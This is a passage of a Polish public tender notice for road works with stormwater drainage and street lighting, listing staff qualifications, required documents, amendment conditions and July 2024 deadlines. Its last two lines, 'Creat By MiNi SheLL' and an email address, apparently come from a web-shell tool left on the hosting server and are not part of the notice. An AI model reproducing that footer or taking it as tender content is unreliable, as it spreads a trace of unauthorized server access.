publicznej o nawierzchni mineralno-bitumicznej w zakresie:<br/>	kanalizacji deszczowej,<br/>	oświetlenia ulicznego.<br/>Doświadczenie dotyczy pełnienia funkcji kierownika budowy <br/>w okresie ostatnich 10 lat przed upływem terminu składania ofert.<br/>Jeśli pełnienie funkcji kierownika budowy rozpoczęło się <br/>w okresie powyżej ostatnich 10 lat przed upływem terminu składania ofert i zakończyło w ciągu ostatnich 10 lat przed upływem terminu składania ofert - Zamawiający uzna takie doświadczenie jako spełniające warunek udziału <br/>w postępowaniu.<br/>Kierowanie robotami przez osobę wykazującą doświadczenie musiało trwać od rozpoczęcia robót do wystawienia Świadectwa Przejęcia/ Protokołu Odbioru Końcowego (przez cały okres realizacji zadania).<br/>	osobę, która będzie pełniła funkcję kierownika robót instalacyjnych posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych, wodociągowych i gazowych,<br/>	osobę, która będzie pełniła funkcję kierownika robót elektrycznych posiadającą uprawnienia budowlane do kierowania robotami <br/>w specjalności elektrycznej,<br/>	osobę, która będzie pełniła funkcję kierownika robót teletechnicznych posiadającą uprawnienia budowlane do kierowania robotami w specjalności telekomunikacyjnej.<br/><br/>Zamawiający dopuszcza możliwość łączenia wszystkich funkcji personelu budowlanego za wyjątkiem kierownika budowy.<br/><br/>W przypadku specjalistów zagranicznych posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej wymaga się od Wykonawcy, aby osoby te spełniały odpowiednie warunki opisane <br/>w art. 12a ustawy Prawo budowlane. <br/>Zamawiający uzna uprawnienia zdobyte na podstawie przepisów obowiązujących przed wejściem w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej ustawy – <br/>w oparciu o art. 104 ustawy z dnia 7 lipca 1994 r. – Prawo budowlane.<br/>2.	Za drogę lub ulicę Zamawiający uzna drogę lub ulicę w rozumieniu ustawy z dnia 21 marca 1985 r. o drogach publicznych.<br/>3.	Zamawiający nie uzna na potwierdzenie spełnienia warunku wykonywania robót budowlanych (drogowych) polegających tylko na odtworzeniu i remoncie nawierzchni drogowej (np. odtworzenie pasa drogowego po wykonanych przekopach w ramach budowy kanalizacji lub innych sieci uzbrojenia podziemnego bądź tylko wymiana warstw bitumicznych nawierzchni <br/>z obramowaniem (krawężniki, ścieki itp. na nowe).<br/>4.	W przypadku inwestycji, których wartość została wyrażona w umowie <br/>w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia inwestycji <br/>(w przypadku inwestycji rozliczanych wyłącznie w walutach innych niż PLN).<br/>5.	Warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej dotyczący wykonanych robót musi być spełniony: <br/>1)	przez Wykonawcę samodzielnie; lub<br/>2)	przez minimum jeden podmiot udostępniający wiedzę i doświadczenie (podwykonawcę) samodzielnie; <br/>3)	w przypadku Wykonawców występujących wspólnie, samodzielnie przez minimum jednego z Wykonawców występujących wspólnie. <br/>Nie jest dopuszczalne łączenie (sumowanie) wyżej wymaganego doświadczenia w ramach doświadczenia różnych podmiotów zaangażowanych w realizację zamówienia.<br/>6.	W sytuacji, gdy Wykonawca polega na doświadczeniu grupy Wykonawców, której był członkiem (np. Konsorcjum), doświadczenie będzie oceniane <br/>w zależności od konkretnego zakresu udziału tego Wykonawcy, a więc jego faktycznego wkładu w prowadzenie działań, które były wymagane od tej grupy <br/>w ramach zamówienia publicznego wykazanego na potwierdzenie spełniania warunku udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Wykonawca, którego oferta zostanie najwyżej oceniona, zostanie wezwany <br/>do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych: <br/>a)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane na formularzu zgodnym z treścią załącznika nr 4 do SWZ, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest <br/>w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty,<br/>b)	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego na formularzu zgodnym z treścią załącznika nr 5 do SWZ, <br/>w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego oraz informacją o podstawie do dysponowania tymi osobami.<br/>2.	Okres, o którym mowa w pkt 1, liczy się wstecz od dnia w którym upływa termin składania ofert.<br/>3.	Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych i/lub usług, które wykonywał wspólnie z innymi Wykonawcami, wykazy, o których mowa powyżej dotyczą robót budowlanych i/lub usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>4.	Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Formularz oferty. Do przygotowania oferty zaleca się wykorzystanie Formularza oferty, którego wzór stanowi załącznik nr 1 do SWZ. W przypadku, gdy Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru, <br/>w treści oferty należy zamieścić wszystkie informacje wymagane w Formularzu oferty.<br/>2.	Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, o niepodleganiu wykluczeniu z postępowania o udzielenie zamówienia publicznego oraz spełnianiu warunków udziału w postępowaniu. Wzór oświadczenia <br/>stanowi załącznik nr 2 do SWZ. <br/>3.	Oświadczenie, o którym mowa w pkt 2 składają odrębnie: <br/>1)	Wykonawca / każdy spośród Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy oraz spełnianie warunków udziału <br/>w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu; <br/>2)	podmiot udostępniający zasoby, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia warunków udziału <br/>w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu <br/>w zakresie, w jakim podmiot udostępnia swoje zasoby Wykonawcy,<br/>4.	W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania – odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia tych dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>5.	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów <br/>na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, ze Wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie określa w szczególności informacje wymienione w rozdziale X pkt 4 SWZ.<br/>6.	Pełnomocnictwo złożone w sytuacji:<br/>1)	Wykonawców wspólnie ubiegających się o udzielenie zamówienia – pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy;<br/>2)	podpisania oferty względnie innych dokumentów składanych wraz <br/>z ofertą przez osobę, dla której prawo do ich podpisania nie wynika wprost <br/>z dokumentu stwierdzającego status prawny Wykonawcy (np. wypisu <br/>z Krajowego rejestru sądowego) – pełnomocnictwo do podpisania oferty.<br/>7.	Kosztorys. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>2. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, o niepodleganiu wykluczeniu z postępowania o udzielenie zamówienia publicznego oraz spełnianiu warunków udziału w postępowaniu. Wzór oświadczenia o<br/>niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu stanowi załącznik nr 2 do SWZ. Oświadczenie, składają odrębnie każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak<br/>podstaw wykluczenia Wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Oświadczenie, z którego wynika, które prace wykonają poszczególni<br/>Wykonawcy – przy czym obowiązek ten dotyczy wyłącznie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 117 ust. 4 ustawy, którego wzór stanowi załącznik nr 3 do SWZ.<br/>4. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>5. Oświadczenie Wykonawcy składane na podstawie art. 125 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych dotyczące podstaw wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia w swoim imieniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość zmiany umowy w przypadkach, o których mowa w art. 455 ustawy Prawo zamówień publicznych oraz w niżej opisanych przypadkach:<br/>1)	przedłużenie terminu realizacji umowy o tyle dni, ile trwało wstrzymanie robót przez Zamawiającego ze względu na wystąpienie nieprzewidywalnych <br/>i niezależnych od stron zdarzeń (w szczególności: klęska żywiołowa, znaleziska niewybuchów, archeologiczne oraz przyrodnicze),<br/>2)	przedłużenie terminu realizacji umowy o tyle dni, ile trwało wstrzymanie robót ze względu na wystąpienie kolizji z dotychczasowym uzbrojeniem <br/>(nie wykazanym lub inaczej wykazanym w dokumentacji przetargowej),<br/>3)	przedłużenie terminu realizacji umowy w przypadku wstrzymania robót przez Zamawiającego z powodu stwierdzenia konieczności wprowadzenia zmian <br/>w dokumentacji projektowej (niewykraczających poza określenie przedmiotu zamówienia zawartego w SWZ) niezbędnych do prawidłowej realizacji robót o czas, na jaki roboty zostały wstrzymane,<br/>4)	przedłużenie terminu realizacji umowy o tyle dni, ile będą trwały opady deszczu nieprzerwanie w okresie powyżej 3 dni (udokumentowane wpisem <br/>w dzienniku budowy i potwierdzone przez Koordynatora Inspektorów Nadzoru Inwestorskiego), które nie pozwolą na realizację robót budowlanych zgodnie z zasadami sztuki budowlanej – z wyłączeniem okresu zimowego od 1 grudnia do 31 marca,<br/>5)	przedłużenie terminu realizacji umowy o tyle dni, ile będą trwały warunki atmosferyczne (udokumentowane wpisem w dzienniku budowy<br/>i potwierdzone przez Koordynatora Inspektorów Nadzoru Inwestorskiego), które nie pozwolą na realizację robót budowlanych zgodnie z zasadami sztuki budowlanej (np. opad deszczu, opad gradu, śniegu, występowanie mrozu, zamarznięty/ rozmokły teren w wyniku panujących warunków atmosferycznych) – z wyłączeniem okresu zimowego od 1 grudnia do 31 marca,<br/>6)	przedłużenie terminu realizacji umowy w przypadku wystąpienia protestów społecznych związanych z realizacją niniejszej umowy, które nie pozwolą na realizację robót budowlanych o tyle dni, ile trwało wstrzymanie robót,<br/>7)	w zakresie zmian wartości wynagrodzenia, o którym mowa w § 6 ust. 2 pkt 1, w przypadku konieczności zwiększenia wartości umownej w wyniku przeliczenia ostatecznie wykonanych i zaakceptowanych przez Zamawiającego ilości robót budowlanych niewykraczających poza zakres zamówienia i cen jednostkowych za poszczególne roboty określone <br/>w kosztorysie ofertowym. Wynagrodzenie zostanie zmienione o wartość wynikającą z przedstawionego przez Wykonawcę i zaakceptowanego przez Zamawiającego i Koordynatora Inspektorów Nadzoru Inwestorskiego kosztorysu powykonawczego na podstawie aneksu.<br/>Szczegółowy zakres zmian precyzuje Załącznik nr 6 – Projektowane postanowienia umowy w sprawie zamówienia publicznego (wzór umowy) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-26 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-26 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamówienie jest dofinansowane z programu Polski Ład Edycja 8 oraz z Przedsiębiorstwa Wodociągów i Kanalizacji Sp. z o.o. w Rybniku. <br/><br/>Z postępowania o udzielenie zamówienia Zamawiający wykluczy wykonawców, <br/>w stosunku do których zachodzi którakolwiek z okoliczności wskazanych <br/>w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach <br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com